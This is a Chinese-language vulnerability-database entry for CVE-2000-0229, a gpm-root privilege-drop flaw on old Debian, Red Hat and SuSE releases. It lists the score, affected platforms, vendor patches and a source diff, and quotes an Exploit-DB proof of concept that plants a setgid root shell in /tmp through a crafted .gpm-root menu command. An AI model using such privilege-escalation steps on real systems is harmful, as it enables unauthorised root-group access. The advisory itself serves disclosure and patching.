CVE-2000-0229
CVSS7.2
发布时间 :2000-03-22 00:00:00
修订时间 :2008-09-10 15:03:40
NMCOE    

[原文]gpm-root in the gpm package does not properly drop privileges, which allows local users to gain privileges by starting a utility from gpm-root.


[CNNVD]多个Linux厂商的gpm Setgid漏洞(CNNVD-200003-041)

        gpm package包中的gpm-root存在漏洞,他不能正确降低权限,本地用户可以通过开启gpm-root功能取得权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:debian:debian_linux:2.2::pre_potato
cpe:/o:redhat:linux:6.0::i386
cpe:/o:redhat:linux:6.1::i386
cpe:/o:suse:suse_linux:6.3SuSE SuSE Linux 6.3
cpe:/o:alessandro_rubini:gpm:1.19
cpe:/o:suse:suse_linux:6.1SuSE SuSE Linux 6.1
cpe:/o:alessandro_rubini:gpm:1.18.1
cpe:/o:debian:debian_linux:2.0Debian Debian Linux 2.0
cpe:/o:suse:suse_linux:6.2SuSE SuSE Linux 6.2
cpe:/o:debian:debian_linux:2.2Debian Debian Linux 2.2
cpe:/o:redhat:linux:6.2::i386
cpe:/o:suse:suse_linux:6.0SuSE SuSE Linux 6.0
cpe:/o:suse:suse_linux:5.3SuSE SuSE Linux 5.3
cpe:/o:debian:debian_linux:2.1Debian Debian Linux 2.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0229
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0229
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200003-041
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1069
(UNKNOWN)  BID  1069
http://www.redhat.com/support/errata/RHSA-2000-045.html
(UNKNOWN)  REDHAT  RHSA-2000:045
http://www.redhat.com/support/errata/RHSA-2000-009.html
(UNKNOWN)  REDHAT  RHSA-2000:009
http://www.novell.com/linux/security/advisories/suse_security_announce_45.html
(UNKNOWN)  SUSE  20000405 Security hole in gpm < 1.18.1
http://archives.neohapsis.com/archives/bugtraq/2000-03/0242.html
(UNKNOWN)  BUGTRAQ  20000322 gpm-root

- 漏洞信息

多个Linux厂商的gpm Setgid漏洞
高危 设计错误
2000-03-22 00:00:00 2005-05-02 00:00:00
本地  
        gpm package包中的gpm-root存在漏洞,他不能正确降低权限,本地用户可以通过开启gpm-root功能取得权限。

- 公告与补丁

        A fix has been released for SuSE Linux. It is available at:
        6.1:
        ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/gpm.rpm
        6.2:
        ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/gpm.rpm
        6.3:
        ftp://ftp.suse.com/pub/suse/i386/update/6.3/ap1/gpm.rpm
        The author has indicated a fix will be present in versions 1.19.1, which will be the final release by the author.
        A temporary solution is to disable gpm-root.
        A patch to fix the problem in gpm-1.19.0 was made available:
        diff -u -r -N ../gpm-1.19.0.orig/doc/doc.gpm ./doc/doc.gpm
        --- ../gpm-1.19.0.orig/doc/doc.gpm Mon Feb 7 23:34:00 2000
        +++ ./doc/doc.gpm Thu Mar 23 14:37:43 2000
        @@ -1969,6 +1969,12 @@
         be broken by this daemon. Things should be sufficiently secure, but
         if you find a hole please tell me about it.
        
        +@item -r
        + Always run commands as root instead of the user who owns the tty.
        + Implies -u. This is useful for those system administrators who
        + put menu entries to reboot or halt the system, start or stop
        + xdm, change keyboard layout etc.
        +
         @item -D
         Do not automatically enter background operation when started,
         and log messages to the standard error stream, not the syslog
        diff -u -r -N ../gpm-1.19.0.orig/gpm-root.y ./gpm-root.y
        --- ../gpm-1.19.0.orig/gpm-root.y Thu Oct 7 20:15:18 1999
        +++ ./gpm-root.y Thu Mar 23 14:37:43 2000
        @@ -41,6 +41,7 @@
         #include
         #include /* sigaction() */
         #include /* pwd entries */
        +#include /* initgroups() */
         #include /* KDGETMODE */
         #include /* fstat() */
         #include /* uname() */
        @@ -117,6 +118,7 @@
         int opt_mod = 4; /* control */
         int opt_buf = 0; /* ask the kernel about it */
         int opt_user = 1; /* allow user cfg files */
        +int opt_root = 0; /* run everything as root */
        @@ -447,6 +449,7 @@
         void f__fix(struct passwd *pass)
         {
         setgid(pass->pw_gid);
        + initgroups(pass->pw_name, pass->pw_gid);
         setuid(pass->pw_uid);
         setenv("HOME", pass->pw_dir, 1);
         setenv("LOGNAME", pass->pw_name,1);
        @@ -539,7 +542,7 @@
         return 1;
         case 0:
        - setuid(uid);
        + if (opt_root) uid=0;
         pass=getpwuid(uid);
         if (!pass) exit(1);
         f__fix(pass);
        @@ -926,6 +929,7 @@
         printf(" Valid options are\n"
         " -m modifier to use\n"
         " -u inhibit user configuration files\n"
        + " -r run commands as root\n"
         " -D don't auto-background and run as daemon\n"
         " -V increase amount of logged messages\n"
         );
        @@ -971,12 +975,13 @@
         int opt;
         gpm_log_daemon = 1;
        - while ((opt = getopt(argc, argv,"m:uDV::")) != -1)
        + while ((opt = getopt(argc, argv,"m:urDV::")) != -1)
         {
         switch (opt)
         {
         case 'm': opt_mod=getmask(optarg, tableMod); break;
         case 'u': opt_user=0; break;
        + case 'r': opt_root=1; opt_user=0; break;
         case 'D': gpm_log_daemon = 0; break;
         case 'V':
         gpm_debug_level += (0 == optarg ? 1 : strtol(optarg, 0, 0));
        A fix has been made available in gpm-1.19.2.
        -------------------------------------------------------------
        Turbo Linux users can use the following fix:
        Update the packages from our ftp server by running the following command for each package:
        rpm -Fvh ftp_path_to_filename
        Where ftp_path_to_filename is the following:
        ftp://ftp.turbolinux.com/pub/updates/6.0/security/gpm-1.19.2-5.i386.rpm
        ftp://ftp.turbolinux.com/pub/updates/6.0/security/gpm-devel-1.19.2-5.i386.rpm
        Alessandro Rubini gpm 1.18.1
        
        Alessandro Rubini gpm 1.19
        
        S.u.S.E. Linux 5.3
        
        S.u.S.E. Linux 6.1
        
        S.u.S.E. Linux 6.2
        
        S.u.S.E. Linux 6.3
        

- 漏洞信息 (19816)

gpm 1.18.1/1.19,Debian 2.x,RedHat 6.x,S.u.S.E 5.3/6.x gpm Setgid Vulnerability (EDBID:19816)
linux local
2000-03-22 Verified
0 Egmont Koblinger
N/A [点击下载]
source: http://www.securityfocus.com/bid/1069/info

A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error, caused when a programmer chose to attempt to revert to the running users groups, after having called setuid to the users id already. The setgid call fails, and the process maintains the groups the gpm-root program is running as. This is usually the 'root' group.

This vulnerability requires the user have console access. 

cp /bin/sh /tmp
create a .gpm-root file in ~ with the following:
button 1 {
name "create a setgid shell"
"setgid shell" f.bgcmd "chgrp root /tmp/sh; chmod 2755 /tmp/sh"
}

click control-left mouse button, and click "setgid shell"
execute /tmp/sh 		

- 漏洞信息

1262
gpm gpm-root Privilege Drop Failure
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-03-22 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Red Hat has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站